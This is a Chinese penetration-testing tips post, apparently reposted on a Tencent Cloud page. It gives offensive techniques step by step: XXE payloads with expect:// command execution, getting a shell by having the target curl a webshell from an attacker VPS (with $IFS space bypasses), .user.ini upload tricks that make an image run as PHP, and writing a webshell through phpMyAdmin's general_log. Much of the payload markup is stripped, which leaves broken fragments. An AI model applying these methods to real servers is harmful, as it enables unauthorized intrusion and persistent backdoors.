1.3、XXE相关技巧 1.3.1、XXE载荷构技巧使用seclists的XXE-Fuzzing.txt的第9行，做一个简单改造即可使用。对比如下：改造前： ]> 改造后： ]> XXE-Fuzzing.txt的路径：SecLists\Fuzzing\XXE-Fuzzing.txt 有了上述载荷以后，再加上回显位置即可成功利用，完整载荷示例： ]> &foo; 1.3.2、命令执行&&getshell 命令执行的原理是把文件读取用的file://协议换成了expect://协议。 ]> &foo; getshell则是命令执行的变种，通过上传webshell来。利用前提：知道目标服务器的脚本语言类型和webshell上传后的大致位置。如果是OSS上，直接寄。 1）使用python托管webshell python -m http.server 8088 2）下载webshell ]> &foo; 此处webshell下载解析： curl -O vps_addr:port/111.php curl vps_addr:port/111.php -o 222.php 空格用$IFS来替代，没啥好说的，常规思路。下载url不能带协议下载url用单引号包裹，如果是-o方式，保存文件的名称也用单引号包裹起来。 1.4、.user.ini文件上传这个跟.htaccess差不多，.user.ini是php给用户的自定义配置文件，可将指定文件按照php脚本文件的形式解析。介绍：https://blog.csdn.net/cosmoslin/article/details/120793126 利用过程： 1）上传.user.ini filename：.user.ini Content-type：image/jpeg 文件正文： GIF89a auto_prepend_file = aaa.jpg 2）上传webshell filename: aaa.jpg Content-type：image/jpeg 文件正文： GIF89a # 可替换为其他webshell 1.5、盲注分析导出数据包：文件——导出分组解析结果——为纯文本通过notepad++解码：提取所有注入数据包，此处使用notepad++中的标记功能，查找模式设置为正则表达式。提取出来以后，找到临界值。当上面的查询语句从1,1到2,1,则上一条语句的=''的值就是SQLi获取到的数据。找到所有数据后，用英文的逗号隔开，然后使用convert从dec转成text。 1.6、phpmyadmin后台写日志马前提：知道web根目录。 set global general_log = 'on'; set global general_log_file = 'c:/phpstudy/111.php' select "" web根目

潇湘信安

社区

活动

圈层

关于

腾讯云开发者

热门产品

热门推荐

更多推荐